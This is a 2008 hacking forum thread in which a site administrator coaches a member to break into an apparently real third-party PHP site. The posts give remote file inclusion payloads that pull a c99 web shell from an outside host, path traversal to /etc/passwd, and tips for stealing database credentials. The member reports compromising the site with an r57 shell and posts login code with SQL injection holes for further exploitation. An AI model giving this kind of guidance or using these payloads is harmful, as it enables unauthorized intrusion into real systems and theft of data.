ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2008-10-07 09:16:37

sam207
Member
Registered: 2008-03-17
Posts: 90

Full path disclosure vulnerability!

Hi guys, greetz
I have a question about full path disclosure vulnerability...
Suppose there is a url parameter as follow:
www.site.com/index.php?page=info
& when I put ' at the end, it errors & the error produced is as following:
Warning: main(info\'.php): failed to open stream: No such file or directory in /home/www/web299/web/index.php on line 114

Warning: main(): Failed opening 'info\'.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/www/web299/web/index.php on line 114

In this error, there is a include_path='.:/usr/share/php:/usr/share/pear'
Now how can I access the included files from this disclosure.
In fact, I have no idea about this.. So please help me.. And if u know any link to some good tuts on it, could u provide the link. I have been searching for this thing but I can't get it.
Thanks in advance..
Regards~
sam207


Offline due to lack of time...

Offline

#2 2008-10-07 15:42:51

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

no problem, but to begin with that looks vulnerable to RFI injection

Warning: main(info\'.php)

its trying to open '.php meaning with a question mark you could do an rfi injection and hack the site (read the rfi tutorial)

the site is on linux. as you can guess usr/share is a shared user folder. pear is probably this made by php:

http://pear.php.net/

/usr/share/php is just the path of the php source code runner. the colon seperated the 2 include paths. All the other folders will probably be forbidden, if you can access them you will probably be able to root the box but its fairly unlikely

if you could find out whats in the folders, using two dots (..) moves you back a directory

page=../../../etc/passwd

for example moving you back 3 directories and reading the password file in etc if possible


Site admin

Offline

#3 2008-10-07 19:41:23

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

I can't rfi coz its adding .php at the end to any kind of shell & also whenever I add nullbyte it adds \0.php at the end..
Even if I use question mark at the end its doing shell.txt?.php & giving similar kind of error..
And how can I look the files on usr/share/php or usr/share/pear.. I can't do it by using ../
I added ../ so many times but still no luck..
& what is pear? probably I will have to research on it.


Offline due to lack of time...

Offline

#4 2008-10-08 04:35:28

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

/usr/share/php and /pear will just be the source code of php and pear which is free to download from the php website

(http://www.php.net/downloads.php#v5)

and when it adds a php to the end thats what the question marks for shell.txt?.php makes the page ignore whats after the question mark

include('http://www.site.com/c99.txt?.php');

anyway, try doing page=/../../../../etc/passwd and post the error it says and if you have a shell hosted somewhere do

index.php?page=http://pathto.shell/c99shell.txt?


Site admin

Offline

#5 2008-10-08 05:28:39

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

Thanks I could rfi the site & I used r57 shell.. I m not being able to edit the existing pages & i can't chmod any files..
Also can u say me how many ways u can exploit following code:

<?
$passwordget=$_POST['password'];
$password=md5($passwordget);

$username=$_POST['username'];
$quota=$_POST['quota'];

if($quota=="Admin") { $table="adminlogin"; } else { $table="memberlogin"; }

if(empty($username)) { die("No Username specified");}
if (empty($passwordget)) { die("No Password specified"); }

include "connect1.php";
$query="SELECT password from $table where username='$username'";
$result=mysql_query($query) or die("Cannot connect you to the admin page");
$row=mysql_fetch_array($result);
$passcheck=$row['password'];
//$passcheck=md5($passcheckget);

//if($row=mysql_fetch_array($result))
//{
if(!($password == $passcheck))
{
die("Wrong username/password");
}



session_start();
session_register("usernameid");
session_encode();
if($quota=="Admin") {
$url="Location: admin/adcd0f89fed565f64fd009c3e582c673.php?username=$username";
header($url);
}
else
{
$url="Location: admin/f55171b381e92093b23f5ea0e7c7fc13.php?username=$username";
header($url);
}

?>

Thanks


Offline due to lack of time...

Offline

#6 2008-10-09 05:56:41

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

Thats some really strange code. Theres probably a hidden element on the form called quota that needs to be changed to Admin. and them php pages seem to be md5 encrypted. Have you tried going to

/admin/adcd0f89fed565f64fd009c3e582c673.php?username=Admin

i noticed from your first post that magic quotes is on. This makes things harder

ps you should check the source code of connect1.php, if the site owners not very clever he will have used the same username and password to connect to the database


Site admin

Offline

#7 2008-10-09 07:53:50

sam207
Member
Registered: 2008-03-17
Posts: 90

Re: Full path disclosure vulnerability!

I had already tried to use that admin thing but that doesnot work.. Also I checked the source of connect1.php which has no good info.. I mean the same username & password is not used.. Also what do u think about session poisoning. Since we know the session that the script sets, can't we poison session.. The session being used for admin is adcd0f89fed565f64fd009c3e582c673 which is also in the url of admin.. Also the site admin is using the site for some illegal stuffs in hidden directories. I included a shell & found that he has been saving some stuffs(porns) in downloads folder.


Offline due to lack of time...

Offline

#8 2008-10-09 11:57:02

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Full path disclosure vulnerability!

This has been solved over PM


Site admin

Offline

Board footer

Powered by FluxBB